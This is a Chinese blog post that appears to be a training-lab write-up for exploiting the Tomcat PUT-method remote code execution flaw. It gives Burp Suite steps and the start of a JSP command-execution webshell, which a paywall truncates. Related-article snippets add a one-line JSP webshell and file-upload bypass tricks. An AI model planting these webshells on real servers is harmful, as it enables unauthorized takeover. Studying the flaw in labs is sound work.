墨者学院-Tomcat 远程代码执行漏洞利用(第1题)

最新推荐文章于 2024-06-24 20:30:00 发布
最新推荐文章于 2024-06-24 20:30:00 发布
阅读量508 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100548535
版权

Tomcat 远程代码执行漏洞利用(第1题)

难易程度:★★★
题目类型:命令执行
使用工具:FireFox浏览器、burpsuite

1.打开burpsuite,访问网页,截包。

2.send to repeater,把GET改成OPTIONS,查看请求方式。
在这里插入图片描述
3.再将OPTIONS改为PUT,加上/1.jsp,在下方写入jsp木马。

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(newInputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"n");}buf.close();} catch (Exception e) {line.append(e.getMessag
最低0.47元/天 解锁文章
JimWu95
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
墨者学院 - Tomcat 远程代码执行漏洞利用(第1)
多崎巡礼的博客
09-17 1281
刷新fit网站 burp截包,repeater,更改不安全的HTTP方法为PUT(将get更改为options可查看服务器支持哪些) PUT /自定义文件名/ HTTP/1.1 eg:   PUT /9.jsp/ HTTP/1.1     (jsp后无空格,反之会报错) 添加以下代码 &lt;%@ page language="java" import="java.util.*,ja...
墨者学院)Tomcat后台弱口令漏洞利用
qq_41453632的博客
01-08 2759
第一部:随便点击靶机链接,跳出一个登录界面,因为目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456 第二步:登录进去过后,发现有一个上传界面,所以直接上传一个war木马即可: 这里先普及下war木马的制作过程: 1.找到一个jsp的小马(我这里先用我使用的jsp木马做例子) &lt;% if("023".equals(requ...
Java安全-Java Web后门学习 Jsp 一句话分析
Love&Share
05-03 2399
文章目录Java Web后门一句话木马反射调用类加载(冰蝎马实现方式)ELSE参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 一句话木马 最简单的 jsp 一句话木马 <% Runtime.getRuntime().exec(request.getParameter("i"));%> .
中间件安全—Tomcat常见漏洞
最新发布
ZL_1618的博客
06-24 598
链接。
upload-文件上传漏洞笔记
2202_75361164的博客
05-28 215
单循环绕过:shell.php. .;如果服务器给.php后缀添加了处理器:AddHandler application/x-httpd-php.php 那么,在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀,可绕过白名单过滤,如:shell.php.jpg。若有则进行绕过,检查php绕过(短标签绕过):<?若没有绕过就可以进行.htaccess绕过和.user.ini绕过,
墨者学院】Weblogic任意文件上传漏洞复现第一
yoyoko_chan的博客
08-02 914
0x00 0x01  访问靶场是个404页面  查阅相关资料后发现这是一个编号为CVE-2018-2894的Weblogic任意文件上传漏洞,其影响范围为(Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。)  根据介绍,该Weblogic管理端有两个页面能够进行任意文件上传,分别是 /ws_utc/begin.do /ws_utc/config.do  访问第一个页面会重定向到一个Weblogic管理登录页面  其账号和密码
tomcat7.x远程命令执行(CVE-2017-12615)漏洞利用复现
m0_58606546的博客
01-11 4088
一、漏洞前言 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 二、漏洞名称 CVE-2017-12615-远程代
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **一句话Webshell后门**:这是一种简单的Web后门,仅用一行代码即可实现远程控制,常见于代码执行漏洞利用中。 **学习资源** - [《深入理解Web安全》](https://www.cnblogs.com/ermei/p/6689005.html) - ...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
memcached所需要的jar包---tomcat8.0
08-08
在标中提到的"memcached所需要的jar包---tomcat8.0",指的是为了在Tomcat 8.0服务器上集成和使用Memcached,你需要下载和添加特定的Java库(jar包)。这些jar包通常包含了与Memcached通信的Java客户端驱动,例如...
360众测靶场库之24-Tomcat 远程代码执行漏洞利用(第1)
zjl12344的博客
03-07 307
360众测靶场
墨者_Tomcat 远程代码执行漏洞利用(第1)
weixin_50698958的博客
10-12 397
靶场: https://www.mozhe.cn/bug/detail/WFVzRjBLZjFObGE4YjFwaGhXLzVldz09bW96aGUmozhe 背景介绍 “墨者”工程师对一个已经授权的网站进行测试,发现全是静态页面。以为没有漏洞,但在测试环境时发现Web 应用服务器是Tomcat,版本为7.0.79。你能找到漏洞吗? 实训目标 1、了解Tomcat配置; 2、了解特定版本的Tomcat漏洞; 3、掌握Tomcat远程代码执行漏洞利用方式; 解方向 通过Tomcat的代
BurpSuite -Repeater
zxj19930410jy的博客
05-05 1263
1.简介 Burp Repeater 是一个手动修改并补发个别 HTTP 请求,并分析他们的响应的工具。它最大的用途就是和其他 Burp Suite 工具结合起来。你可以从目标站点地图,从 Burp Proxy 浏览记录,或者从 Burp Intruder 攻击结果上的请求,发送到 Repeater 上,并手动调整这个请求来微调对漏洞的探测或攻击 2.设置代理 2.1 BurpSuite 设置代理 点击Proxy模块,查看Options信息,勾选代理地址和端口 2.2 浏览器设置代理 我使用
命令执行漏洞之远程命令执行和系统命令执行
bwxzdjn的博客
03-27 5645
用实验案例的方式讲解远程命令执行和系统命令执行两大漏洞利用方法。通过实践更深入地了解命令执行漏洞的成因和危害,更好地掌握web安全相关方面的知识。
[Vulfocus解系列] Struts2-052远程代码执行漏洞(CVE-2017-9805)
00勇士王子的博客
07-14 2236
漏洞介绍 名称: struts2-052 远程代码执行 (CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行
Spring Web Flow 远程代码执行漏洞分析
weixin_67271870的博客
11-23 564
漏洞在2017年5月31号被提交到平台,官方并没有详细的信息,通过官方描述和补丁的对比,我们可以大致推断应该是Spring WebFlow在Model的数据绑定上面,由于没有明确指定相关model的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行漏洞,这个漏洞利用除了版本的限制之外还有两个前置条件,这两个前置条件中有一个是默认配置,另外一个就是编码规范了,漏洞能不能利用成功主要就取决于后面的条件。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值